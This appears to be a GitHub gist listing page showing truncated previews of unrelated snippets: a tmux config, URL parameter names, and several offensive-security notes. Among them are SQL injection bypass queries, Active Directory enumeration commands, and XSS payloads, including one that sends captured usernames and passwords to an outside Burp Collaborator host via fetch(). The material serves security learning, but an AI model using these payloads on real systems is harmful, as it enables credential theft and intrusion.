This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|=--------------------------------------------------------------------=| | |
|=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=| | |
|=-------------------------=[ 6 October 2011 ]=-----------------------=| | |
|=----------------------=[ By CWH Underground ]=--------------------=| | |
|=--------------------------------------------------------------------=| | |
###### | |
Info | |
###### |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ver | |
v | |
t | |
id | |
tid | |
cid | |
z | |
gdpr | |
_v | |
jid |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
unbind C-b | |
set-option -g prefix C-a | |
bind-key C-a send-prefix | |
bind | split-window -h | |
bind - split-window -v | |
unbind '"' | |
unbind % | |
bind r source-file ~/.tmux.conf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗ | |
██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║ | |
██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║ | |
██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║ | |
██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║ | |
╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ | |
@intx0x80 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
`-=[SQL injection Queries]=- | |
HOW TO SUCCESSFULLY INJECTING SQL INJECTION | |
[~] after id no. like id=1 +/*!and*/+1=0 [~] | |
EX: site.com?index.php?pageid=3 div+0 Union select 1,version(),3,4,5 | |
+div+0 | |
+div false | |
+Having+1=0+ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Enumeration | |
# Credential Injection | |
runas.exe /netonly /user:<domain>\<username> cmd.exe | |
# enumeration users | |
users | |
net user /domain |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# pwning | |
https://pwn.college/ | |
https://www.ret2rop.com/ | |
https://akshitsinghal6399.medium.com/rop-chain-exploit-with-example-7e444939a2ec | |
https://ironhackers.es/en/tutoriales/pwn-rop-bypass-nx-aslr-pie-y-canary/ | |
https://guyinatuxedo.github.io/ | |
https://github.com/0xmanjoos/Exploit-Development | |
https://doar-e.github.io/archives.html | |
https://exploitreversing.com/2023/04/11/exploiting-reversing-er-series/ | |
https://crackmes.one/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
🔥Complete Bug Bounty Cheat Sheet🔥 | |
XSS | |
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md | |
https://github.com/ismailtasdelen/xss-payload-list | |
SQLi | |
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
########################## xss using postmessage api ############### | |
<iframe src="//vulnerable-website" onload="this.contentWindow.postMessage('alert(1)','*')"> | |
################ Exploiting cross-site scripting to capture passwords ############################################ | |
<input name=username id=username> | |
<input type=password name=password onchange="if(this.value.length)fetch('https://lolo.burpcollaborator.net',{ | |
method:'POST', | |
mode: 'no-cors', | |
body:username.value+':'+this.value | |
});"> | |
#########################hunting phishing site ############################ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Name : Finding vulnerabilities in PHP scripts FULL ( with examples ) | |
Author : SirGod | |
Email : sirgod08@gmail.com | |
Contents : | |
1) About | |
2) Some stuff | |
3) Remote File Inclusion | |
3.0 - Basic example | |
3.1 - Simple example |
NewerOlder